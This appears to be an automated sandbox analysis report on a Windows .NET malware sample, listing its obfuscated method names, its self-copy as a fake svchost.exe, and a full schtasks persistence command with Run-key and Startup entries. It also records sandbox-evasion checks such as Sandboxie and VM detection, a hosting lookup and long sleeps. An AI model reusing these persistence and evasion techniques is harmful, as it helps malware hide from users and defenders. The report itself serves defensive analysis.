                                   Source: WV7Gj9lJ7W.exe, mEMctJ62dLnMaiPT5KFDAPnsIeuT2SibjV9v92SvruauN.cs | High entropy of concatenated method names: 'caZZO7FJB5MgNZYKU7bnFPUmIpW7O3OotbdwueTCPaMDv', 'BWYSgwbdewN1Pj1kRtkXa0yQRt8tLYfQvQwLkKaIJ23ml', 'lMjfsbGxsPuryCxLroIgnXKI3BuA0yywVGKZuU6K5Ym1J', 'mDqu5hS6MIPrQmdl8W5xJabrXw5gkQ8laFVX1pqQCSQPa', 'GyZxcfiQcIFyhJ5KcOw5GVLO1M1os0lW9cAYHiVhklyA1', '_2lLgZlRHpSLWJrC1Q3m0iTtekc14PWgkBoifcONOZOlfG', 'MadPtqRY4CELmJv147dyqfAg2KWeRalVvHXrqAVHChpNr', 'TxyJCy9MVL77OtF6ImM2zYCw2uAHzDOUxvRakni6npGzo', 'JkIzOegnMmo3s68MzID2gqKw3MGQVGKwC8cQqNCMdf6QY', 'iVDPnAhG6ZdGZzb88qVpk6rDBRr76OEqFn4YMW88zmC7B'
                                   Source: WV7Gj9lJ7W.exe, CJam979yUJ3BepXKxOYvRdOc3MuWKQ1MQpVdlrMnmtC8lCvyWDcRTyQ8DvkW.cs | High entropy of concatenated method names: 'LPhiDpGNyupk0QkTJeRDXuAXKk4nZt8S7gmxwZHwaEyqOaCNeE2QcCfLrl2b', 'ZsbMZDmnYIyQzomYcwRhK9DDlwuIy5BYf2rlu7c8uwLhR8R8wO5Zp5QDrg8X', 'q2w1fq2KFMMamsZ6xiMch4B4urGzjjpGxlvQbNDXbBQlzANIStPXANe31EiU', 'teJw5EvhYnucnVqv9E67QSiuB2xkrWyyR8L5kK40GRPwUk3E2703WSSjy60q', 'jo9ARCBqotH12u4jiSrikMJ99HOlIpwcdC5tktu7JtfPeSe9uu7mhAZMPCw9', '_2qkCczNsQvHiRJmqh4e6GA9IKK5YYFT3ttq9XNIhOmBvwiBGS7uoCWPIfX5o', 'shecwU6o120NPfi6qrrKEPcXovd6dSgPxySAbGyB5aMkJqs2JaWT3lfGNAgF', 'QyjxGFi7lmx4DuYz8HRgQFz4PJg7wYXqVzYHiUMED8aolhTTlFzBKRZdUeLq', 'HW08iqc39U4VFyArbSBvUymM4FMSR4RpIRTKd3PlGIQwVbAzPPdo9Y4imupc', 'J7ZlavZodWZZQra3fPoAKEvgOiTjqWW54JG7F1TQUxyDI'
                                   Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs | High entropy of concatenated method names: 'gsjBXZ37xlu3Pgbwrtg4vL41gtNEaPYaFrlk5KV5K7J7Q', 'rDaGax8TnhfgWhb96TG1vEf0gYpyPGm2OzPfSfrp7JvXr', 'rZk0So3B2qBGNsETvguKChb4BbBP8n7tNslq5LVdLouVN', 'ngkVjhYXgOlHrLuTBFz85U0aIAX1FJjOrvI9E8was4gsn', 'fGxoP2NJQ6e3T8FmZrsKfyD32VUbvvT6hy6TTTlLgmpJS', 'CAEtjMlryCB8plQS4BwkRkfNpvgBqGMCNnA1ALbP7Epil', '_31rX662av2ICwVBfdXsJYMw6U4vpgGIYoxYW2mx9V4fRO', 'MCbZWakKPYzbmlCSIysGx7rnE7Awv6xtyohayUMfQus14', 'd28o9r0Y568Yqc9UaUWgauleK6wX7zqOliWYLh9FosoU8', 'ry5ytayEO67BvgZTs0giQjzjxF1hXl4lGcPO58Ntu6Evv'
                                   Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | High entropy of concatenated method names: 'TqHoBHLeqk1ykJYWtDmzAvlbMZPfwaJUMDRdTqgk7MxFz', 'VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP', 'ajFESKUOmlFLcJlAhY3aiK2rnBPoAmmtL7OCOhOsMSD7w', 'NUXnfVPIauOXEHNj99T919xlIVaZuXns9d1ZYKqWm16lN', 'xwPEpln1nibh4UhRM7kvXTf5vsGRdbjn1IONVe4qcVQHv', 'yXeXianhbNU40Kyrt7w1cPV2K6OeqDjj1JhkgWtLs2Chn', 'SK0pcMI6yma9l8Hp5jHoMZGpCfwbWDANtHuJ2Kh3y0OCt', 'EnwCf6xKrXQ1ZYb5XnSAU7cDURaYrekOdgByfbaG17EtA', '_0r7GaoOFubOWhewAz3YGBaDffErs351I9gCTCL3weWTpX', '_3puQ2eaZ6vEXyDvqKd3gwyJu3z5l3YC4WYsE0djfynr2B'
                                   Source: WV7Gj9lJ7W.exe, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs | High entropy of concatenated method names: 'eHJHSZbUFMHuDlsgt06d9ymOkD9rB7winu9BcMTSYaUwUdFYDrVHT4NS1KEc7WdCQcPha83kSWQPx', 'DBwTzVYAj0OlXZD7iKREHEQzm9iVJxP9JaI8y', 't4Pt0laeFIKZ1drk6fylwVxBDN7Bu4Ogj7LW4', 'FC1hCksYTeqI5YEvizv2lkSf36OOnmkj2LfWf', '_6eKKeAz5qdwuHhXipOpE8sbds97HV8zYbRSxv'
                                   Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs | High entropy of concatenated method names: 'ds3aGKgg1oiG6NqZOeTJuOlHCWHkAGVFdvjQ0EswmB29Hkw1fNzaZnSwyXR29uHtmN1QIvEEvh9iB', 'eDbv3OxSnYNivcZ1H9KT8kLfKwPXn63H7kLnJnJ44HijwhwmIWhGxbHUe239z9rIEnXHHcfAGTtpo', 'ZoVtxeSHR42WIpJCL1sglvgjf3AMH73YZx9UWpY3XorYNiRo7KW4STDzjA6yBQVCKGx3JIuXgf2QH', 'zUOykfwxJ07CoUYchVWmMqUhoDCv5Ik62ZQR4BRwOVBgRgsmUq5MwhV2mSFPB9UqBTzQ8pPq2eEvd', 'DKpA8fcq9OZEWLyqzR1G4J0CWUNEmAAwPt44eWHPalrTwxeolZ9mpJM6NXwntFas9mrWNlKkLsC7t', 'zb9c9G1YiJKqRtvBdtHeclNxmKjZCYJOE4b9obVuWLFduTy8GwB2QiRVOgCMpAS3AiPbM6XaMDoRz', 'jvm8pxvCwJVxGBwQ20W0GUv6mmWGpGau9qeUi8dsyqCBMiGsXWC9cxmX2bx5t3Akeln1A5AiRg83E', '_5tvOB8IKfSaR8yUijr3gsJ0ALECffPvW29mvpobrc5s1IvX9lr94I4oQ6Sme4pyTeJSigZjW4YJCS', 'YJzGPkrabKVcrFBkGIyFk25PMRE9BUZKYdRswpPLuQ3XGz4ZgzFkJ1z342K6DjFKYCo8j06v7LZlf', 'EihXhbaK7HgJ5FqKQdiV7I5LEpvOMIjISpUqMghjafuXOCuKRVaO7MgyeiM3d5qGagL9NXXQhHBkR'
                                   Source: WV7Gj9lJ7W.exe, C4gGYUvWN18G9l2hocBF2CWYzbPPKT1kTmJi83nHjcK6eRA10zBaeiiN3XvONpq260iicDMmpvue1.cs | High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_4AwoLb8w8tjx5jKViAlbKypkkKXIuHLucONq8Z6hZ6fCh6mfSOX4WOufslFXQxyQkWyiWBZVFaFuA', 'uQUdpik0SrcOqNytG3RkVvn9VDtGdnnbsLcHY', 'KnwawU5cr7z9TvPKtF2xxO4DecOSX70nXOvZa', '_9VKDxMdtfmJSWPqZ0R42jXCg5Vo9NAqfCabzh', 'yFcSURPynt5k8LnL2H4XQya3yflF7DxrmXVgN'
                                   Source: svchost.exe.0.dr, 27nQSNX0HYY6kClZEDjv.cs | High entropy of concatenated method names: 'ueqQqejJterhoHm1K1Jy', 'FeELXdV4V5TjgQQ6okzA', 'w56uiyv9mk97wBLCBUpy', 'wZVMIBp6mrg9dO2oZucojhhHDEWvqQZUHMRZI', 'Co7Gtn8ZvgJDb6ZvQf6LESdxREpOnkh1WZJvt', 'ElnyCMggM8MKTh0D6qPHPlDjBzxBnX7RL2uMz', 'GDsVpslrxrSf0fKTh6U10jwits0f29D58vgOm', 'UZCN52VB9MgUUWC5bR3jULzpLfWpKdBWNxSEl', '_4ymlMh3d0VjJ29vjUGQ5iZb5UZ12m4arohsYR', 'Xi13qzePlUtqsRazdJbJgFYSK916d3Z7Tm40S'
                                   Source: svchost.exe.0.dr, MX9MPbJBnyOxLe7MYhq37R4NjeJWR2ZJdXjYr4UsDzVbLrue6sPA1La6LKal.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xo1kf4Jx30YPVKNDUt6W', 'FrCO0gWCI3Cc129MlUiJ', 'VCe1cecq1AUIncRNW2g0', 'kz8Gz8qF90ulGQNXgN7q'
                                   Source: svchost.exe.0.dr, 316U38w4QVmq2sHFnBvkd4LieyieRq76dn2Kimj2SAfAl.cs | High entropy of concatenated method names: 'hI9KT6csSEYaPv773xBYfKRtTKNVnU7dJn8Qp7EhP9o8D', 'lEZz5agvylve7hksOkLER989WBvtK7k47gcAiIoovQbyf2w8px3wk2BFpD6525UdCuvfpN2sgvMP00OCkrZ7K0hzO3EQqMa', 'qThp3Tnp9uL3mCcx2RKuJOmWtl45lRIvOF9dn1VfKP4GUZGNAE2peaPzu6ACiRMvAZijeLhApv2fylmlEDm0IpwTEDX49yl', '_8Ok5pYSWOD96ESoPqEFtnEDOaH6skpryUVavXewN6tTmHaUVo9u2GANNMKwoYypuNmSwcWOkHXOURN6CNuhWPnjxInE7uF8', '_6YuBy37IC7jwy9VRa0lxGiDaoZtqy93ayCJfcLWCuwbXmNIVfj3VIGIFyG3dOMObHLIc64sjxELzJ2fcJZ0tXMsTSoQ1G4v'
                                   Source: svchost.exe.0.dr, ake8eTev2BMeufFpdYvXz1rggei7SGsicHjO2bESD2ok5TLhCDsYXlIFx6fvqouj8uy8v8luRiBFk.cs | High entropy of concatenated method names: 'YYHDR1FlBjBxXOU39qSvS1EcsQh0tj8gM35gmXuZITmuiPk08Lm78xWkFCYLoEb3zCUSMok6n8Pz3', 'VDfFRo8LYl1tIXFA06Is3iUDeWnzk1ge8Klc9j3EikbSyEv5jSSlbeFcLIsx826PuEyDRYQKfK5yQ', 'tBSpzoYaZ38vEVkNARodMehzxQe0HGo9Fh3I2', 'c4mbtuvxK9W16V045BYBHgfKZc4cfE26553dq', 'uJ1TmU8R3cr3rAutD0RpanDoSqLqmjn0dnqog', '_3k0jFaralJt9bZKXRcPcjgCnPx3FPWpHraTEk'
                                   Source: svchost.exe.0.dr, cSNl319mLCwHfhwaDWRYhnKG8D3oxANewMPCBZ2pid1LPBXyU3ptz6Bh9XCQ5pUwwZOVIjaKEPlJe.cs | High entropy of concatenated method names: 'knTr5CJmVp8X9Ko4GZ7ckQNOEhaAynFQXlojQjbSxyl6OhyyDttZrHspfT6xQHm9BOS3diXSEYNSj', 'l66FIfebctAmOjmY7AtDWwoehjmyLESp9Q7ABrsRINsdXHbENH3vJWlYj8DmXd1gwPJS5erC32HOw', 'weMfLXyg4oTWv5b8kh8dYP2K7WshUjVvSn6AK6VNwu8umcIenO7s7tFITnWeBXfd48CZ5M3RLXIAU', 'rkq8Va3BA7apdfvH3rnX9doZlXOicZYXqnyfcDPvBeEls1t7ms86njfHIJOOSwsyr2B4JI4ugQHUY', 'qzBVRY0F1Da1G0Kepxt7anYKc5eHxOc6FffmL', 'TED3M9IaM0EnSj6YZgk3fv5dubsZ9Agoh3plW', 'Yk46pcnFd76Nc6AQvsO7LcEfWflt7KQyxFvcz', 'T66YrvMTGMmZQ8J0zkbd118JJVsitKhmjzGZm', 'VFlaKlbCgpAuH3kfCBnvtwECtfXz7cihAcr9M', 'XicSwzaAyuqo3OkjMsrJSrZFOEiadmmrqpZH1'
                                   Source: svchost.exe.0.dr, mEMctJ62dLnMaiPT5KFDAPnsIeuT2SibjV9v92SvruauN.cs | High entropy of concatenated method names: 'caZZO7FJB5MgNZYKU7bnFPUmIpW7O3OotbdwueTCPaMDv', 'BWYSgwbdewN1Pj1kRtkXa0yQRt8tLYfQvQwLkKaIJ23ml', 'lMjfsbGxsPuryCxLroIgnXKI3BuA0yywVGKZuU6K5Ym1J', 'mDqu5hS6MIPrQmdl8W5xJabrXw5gkQ8laFVX1pqQCSQPa', 'GyZxcfiQcIFyhJ5KcOw5GVLO1M1os0lW9cAYHiVhklyA1', '_2lLgZlRHpSLWJrC1Q3m0iTtekc14PWgkBoifcONOZOlfG', 'MadPtqRY4CELmJv147dyqfAg2KWeRalVvHXrqAVHChpNr', 'TxyJCy9MVL77OtF6ImM2zYCw2uAHzDOUxvRakni6npGzo', 'JkIzOegnMmo3s68MzID2gqKw3MGQVGKwC8cQqNCMdf6QY', 'iVDPnAhG6ZdGZzb88qVpk6rDBRr76OEqFn4YMW88zmC7B'
                                   Source: svchost.exe.0.dr, CJam979yUJ3BepXKxOYvRdOc3MuWKQ1MQpVdlrMnmtC8lCvyWDcRTyQ8DvkW.cs | High entropy of concatenated method names: 'LPhiDpGNyupk0QkTJeRDXuAXKk4nZt8S7gmxwZHwaEyqOaCNeE2QcCfLrl2b', 'ZsbMZDmnYIyQzomYcwRhK9DDlwuIy5BYf2rlu7c8uwLhR8R8wO5Zp5QDrg8X', 'q2w1fq2KFMMamsZ6xiMch4B4urGzjjpGxlvQbNDXbBQlzANIStPXANe31EiU', 'teJw5EvhYnucnVqv9E67QSiuB2xkrWyyR8L5kK40GRPwUk3E2703WSSjy60q', 'jo9ARCBqotH12u4jiSrikMJ99HOlIpwcdC5tktu7JtfPeSe9uu7mhAZMPCw9', '_2qkCczNsQvHiRJmqh4e6GA9IKK5YYFT3ttq9XNIhOmBvwiBGS7uoCWPIfX5o', 'shecwU6o120NPfi6qrrKEPcXovd6dSgPxySAbGyB5aMkJqs2JaWT3lfGNAgF', 'QyjxGFi7lmx4DuYz8HRgQFz4PJg7wYXqVzYHiUMED8aolhTTlFzBKRZdUeLq', 'HW08iqc39U4VFyArbSBvUymM4FMSR4RpIRTKd3PlGIQwVbAzPPdo9Y4imupc', 'J7ZlavZodWZZQra3fPoAKEvgOiTjqWW54JG7F1TQUxyDI'
                                   Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs | High entropy of concatenated method names: 'gsjBXZ37xlu3Pgbwrtg4vL41gtNEaPYaFrlk5KV5K7J7Q', 'rDaGax8TnhfgWhb96TG1vEf0gYpyPGm2OzPfSfrp7JvXr', 'rZk0So3B2qBGNsETvguKChb4BbBP8n7tNslq5LVdLouVN', 'ngkVjhYXgOlHrLuTBFz85U0aIAX1FJjOrvI9E8was4gsn', 'fGxoP2NJQ6e3T8FmZrsKfyD32VUbvvT6hy6TTTlLgmpJS', 'CAEtjMlryCB8plQS4BwkRkfNpvgBqGMCNnA1ALbP7Epil', '_31rX662av2ICwVBfdXsJYMw6U4vpgGIYoxYW2mx9V4fRO', 'MCbZWakKPYzbmlCSIysGx7rnE7Awv6xtyohayUMfQus14', 'd28o9r0Y568Yqc9UaUWgauleK6wX7zqOliWYLh9FosoU8', 'ry5ytayEO67BvgZTs0giQjzjxF1hXl4lGcPO58Ntu6Evv'
                                   Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | High entropy of concatenated method names: 'TqHoBHLeqk1ykJYWtDmzAvlbMZPfwaJUMDRdTqgk7MxFz', 'VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP', 'ajFESKUOmlFLcJlAhY3aiK2rnBPoAmmtL7OCOhOsMSD7w', 'NUXnfVPIauOXEHNj99T919xlIVaZuXns9d1ZYKqWm16lN', 'xwPEpln1nibh4UhRM7kvXTf5vsGRdbjn1IONVe4qcVQHv', 'yXeXianhbNU40Kyrt7w1cPV2K6OeqDjj1JhkgWtLs2Chn', 'SK0pcMI6yma9l8Hp5jHoMZGpCfwbWDANtHuJ2Kh3y0OCt', 'EnwCf6xKrXQ1ZYb5XnSAU7cDURaYrekOdgByfbaG17EtA', '_0r7GaoOFubOWhewAz3YGBaDffErs351I9gCTCL3weWTpX', '_3puQ2eaZ6vEXyDvqKd3gwyJu3z5l3YC4WYsE0djfynr2B'
                                   Source: svchost.exe.0.dr, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs | High entropy of concatenated method names: 'eHJHSZbUFMHuDlsgt06d9ymOkD9rB7winu9BcMTSYaUwUdFYDrVHT4NS1KEc7WdCQcPha83kSWQPx', 'DBwTzVYAj0OlXZD7iKREHEQzm9iVJxP9JaI8y', 't4Pt0laeFIKZ1drk6fylwVxBDN7Bu4Ogj7LW4', 'FC1hCksYTeqI5YEvizv2lkSf36OOnmkj2LfWf', '_6eKKeAz5qdwuHhXipOpE8sbds97HV8zYbRSxv'
                                   Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs | High entropy of concatenated method names: 'ds3aGKgg1oiG6NqZOeTJuOlHCWHkAGVFdvjQ0EswmB29Hkw1fNzaZnSwyXR29uHtmN1QIvEEvh9iB', 'eDbv3OxSnYNivcZ1H9KT8kLfKwPXn63H7kLnJnJ44HijwhwmIWhGxbHUe239z9rIEnXHHcfAGTtpo', 'ZoVtxeSHR42WIpJCL1sglvgjf3AMH73YZx9UWpY3XorYNiRo7KW4STDzjA6yBQVCKGx3JIuXgf2QH', 'zUOykfwxJ07CoUYchVWmMqUhoDCv5Ik62ZQR4BRwOVBgRgsmUq5MwhV2mSFPB9UqBTzQ8pPq2eEvd', 'DKpA8fcq9OZEWLyqzR1G4J0CWUNEmAAwPt44eWHPalrTwxeolZ9mpJM6NXwntFas9mrWNlKkLsC7t', 'zb9c9G1YiJKqRtvBdtHeclNxmKjZCYJOE4b9obVuWLFduTy8GwB2QiRVOgCMpAS3AiPbM6XaMDoRz', 'jvm8pxvCwJVxGBwQ20W0GUv6mmWGpGau9qeUi8dsyqCBMiGsXWC9cxmX2bx5t3Akeln1A5AiRg83E', '_5tvOB8IKfSaR8yUijr3gsJ0ALECffPvW29mvpobrc5s1IvX9lr94I4oQ6Sme4pyTeJSigZjW4YJCS', 'YJzGPkrabKVcrFBkGIyFk25PMRE9BUZKYdRswpPLuQ3XGz4ZgzFkJ1z342K6DjFKYCo8j06v7LZlf', 'EihXhbaK7HgJ5FqKQdiV7I5LEpvOMIjISpUqMghjafuXOCuKRVaO7MgyeiM3d5qGagL9NXXQhHBkR'
                                  Source: svchost.exe.0.dr, C4gGYUvWN18G9l2hocBF2CWYzbPPKT1kTmJi83nHjcK6eRA10zBaeiiN3XvONpq260iicDMmpvue1.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_4AwoLb8w8tjx5jKViAlbKypkkKXIuHLucONq8Z6hZ6fCh6mfSOX4WOufslFXQxyQkWyiWBZVFaFuA', 'uQUdpik0SrcOqNytG3RkVvn9VDtGdnnbsLcHY', 'KnwawU5cr7z9TvPKtF2xxO4DecOSX70nXOvZa', '_9VKDxMdtfmJSWPqZ0R42jXCg5Vo9NAqfCabzh', 'yFcSURPynt5k8LnL2H4XQya3yflF7DxrmXVgN'

                                  Persistence and Installation Behavior

                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe (observed twice)

                                  Boot Survival

                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk (observed twice)
                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost (observed twice)
                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                   Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process information set: NOOPENFILEERRORBOX (observed 62 times)
                                   Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process information set: NOOPENFILEERRORBOX (observed 140 times)

Malware Analysis System Evasion

Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: WV7Gj9lJ7W.exe, svchost.exe.0.dr | Binary or memory string: SBIEDLL.DLL)M9XAQTYORYTFKMYYFRL0)ESEPKMVNRVOAIMO0TS5J)5SV1GLMSOR7I5HCRJHB6)TAVJK7ZOHZPL02SA3EFM)MKAC3LTH4B04KZGDMQFR)SECJYPQFD4M8G0GH2RTP)QMBDWWNGWRBSQBCKFZZR)VHEQVCCWSSRQRH4OZ8QT)EEJCEOZ5E1DFKLJ9MYLU)R1ULFCIGSXP2MUANNY1X)7PH9KMYOJ7FQIE4A2GXA)HBZ6KRKMOSC82EMMA9XU)QYRSKEIP7H2R7DZIDLIG)A4PZEQPMXXIWLBFPYND6)ZNCUUGIYTYORWJ00SAUQINFO
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Memory allocated: 1340000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Memory allocated: 1AF50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 2610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1A610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 2E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1AE10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 5D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1A4A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1AEA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1A4A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 1B0A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599874
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599546
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599262
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599152
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 599035
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598921
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598812
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598703
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598593
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598484
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598375
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598265
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598156
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 598047
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 597937
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 597828
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 597718
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Window / User API: threadDelayed 1451
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Window / User API: threadDelayed 8399
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599262s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599152s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -599035s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598921s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598812s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598703s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598593s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598484s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598375s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598265s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -597718s >= -30000s
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 | Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5544 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4632 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5440 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3544 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3176 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6164 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6480 | Thread sleep time: -922337203685477s >= -30000s
